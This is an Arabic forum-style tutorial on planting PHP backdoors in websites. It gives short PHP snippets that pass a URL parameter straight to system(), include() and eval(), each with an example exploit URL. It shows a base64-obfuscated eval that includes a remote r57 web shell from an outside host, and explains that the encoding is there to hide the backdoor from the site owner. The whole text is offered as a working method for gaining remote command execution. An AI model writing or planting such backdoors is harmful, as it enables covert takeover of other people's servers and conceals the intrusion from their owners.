طبعا الدوال المهمه الذي يستفاد منها هي
include + system + eval
استخدام system
كود PHP:
<?php
if(empty($_GET['tryag'])){
} else {
$m=$_GET['tryag'];
echo system($m) ;
}
?>
الاستغلال للكود :
http://www.web.com/filname.php?tryag=[cmd] cmd = اوامر لينكس
جاهز سل
استخدام include
كود PHP:
<?php
if(empty($_GET['tryag'])){
} else {
$m=$_GET['tryag'];
print include($m) ;
}
?>
:
http://www.web.com/filname.php?tryag=[shill.txt] cmd = اوامر لينكس
استخدام eval
طبعا ايفل لها طريقتين وهي تمرير الكود عن طريق تشفير
ASCII-table
وطريقه الاستخدام
كود PHP:
<?php
if(empty($_GET['tryag'])){
} else {
$m=$_GET['tryag'];
eval(stripslashes($m));
}
?>
الاستغلال للكود :
http://www.web.com/filname.php?tryag=[code] code = هو كود php مشفر عن طريق
ASCII-table
وهذا مثال لفهم الفكره بشكل اوضح
رابط المثال
الطريقه الثانيه وهي استخدام ايفل بدون تشفير
كود PHP:
<?php
if(empty($_GET['tryag'])){
} else {
$m=$_GET['tryag'];
@eval(stripslashes($m));
}
?>
الاستغلال للكود :
http://www.web.com/filname.php?tryag=[code]code = هو كود php
ومثال اخر
رابط المثال
طبعا احيانا نضطر للتشفير الكود بحيث نصعب المسأله امام صاحب الموقع
وطرق التشفير كثره
وسأستخدم تشفير
Base64
كود PHP:
<?php
if(empty($_GET['tryag'])){
} else {
$m=$_GET['tryag'];
eval(base64_decode('aW5jbHVkZSgiaHR0cDovL3JzdC52b2lkLnJ1L2Rvd25sb2FkL3I1N3NoZWxsLnR4dD8iKTs='));
}
?>
الاستغلال للكود :
http://www.web.com/filname.php?tryag=[cmd] cmd = اي قيمه
شرح الكود
هو نفس استغلال ايفل ولكن مررنا الكود
php بتشفير
Base64
التشفير
كود PHP:
aW5jbHVkZSgiaHR0cDovL3JzdC52b2lkLnJ1L2Rvd25sb2FkL3I1N3NoZWxsLnR4dD8iKTs=
وفـكه هو
include("http://rst.void.ru/download/r57shell.txt?");
وعند تمرير اي قيمه للمتغير
tryag
سيتم تنفيذ الكود
مثال
رابط المثال
هذا مالدي بهذا الموضوع واتمنى وضع الفائده من الجميع
ملاحظه : يمكن استخدام دوال انشاء ملف والكتابه بداخله
[code]